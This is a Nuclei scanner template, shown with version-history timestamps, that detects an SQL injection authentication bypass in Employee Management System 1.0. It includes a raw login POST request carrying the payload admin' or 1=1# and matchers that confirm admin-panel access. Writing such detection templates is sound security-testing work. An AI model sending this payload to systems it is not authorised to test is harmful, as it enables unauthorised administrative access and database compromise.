nuclei-templates/http/vulnerabilities/other/ems-sqli.yaml

48 lines
1.5 KiB
YAML
Raw Normal View History

2022-07-21 07:09:06 +00:00
id: ems-sqli
info:
name: Employee Management System 1.0 - SQL Injection
2022-07-21 07:09:06 +00:00
author: arafatansari
severity: critical
2022-07-21 07:09:06 +00:00
description: |
Employee Management System 1.0 contains a SQL injection vulnerability via the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-07-21 07:09:06 +00:00
reference:
- https://www.exploit-db.com/exploits/48882
2022-07-30 06:46:47 +00:00
- https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score: 10
cwe-id: CWE-89
2022-07-30 06:46:47 +00:00
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
tags: ems,sqli,cms,auth-bypass,edb
2022-07-21 07:09:06 +00:00
http:
2022-07-21 07:09:06 +00:00
- raw:
- |
POST /process/aprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2023-07-20 07:43:09 +00:00
mailuid=admin' or 1=1#&pwd={{rand_base(5)}}&login-submit=Login
2022-07-21 07:09:06 +00:00
host-redirects: true
2022-07-21 07:09:06 +00:00
max-redirects: 2
2023-10-14 11:27:55 +00:00
2022-07-21 07:09:06 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Admin Panel'
2022-07-30 06:46:47 +00:00
- 'Log Out'
2022-07-21 07:09:06 +00:00
- 'Employee Management System'
2022-07-30 06:46:47 +00:00
condition: and
2022-07-21 07:09:06 +00:00
- type: status
status:
- 200
# digest: 490a004630440220495a1734a2d13880983f6999ef0a455d784a639df64c44d0eab8c51e5ef49900022054327dfd19f47691299fe0b2d6f895925327d1c464a8636e33d87c0a7b9dc030:922c64590222798bb761d5b6d8e72950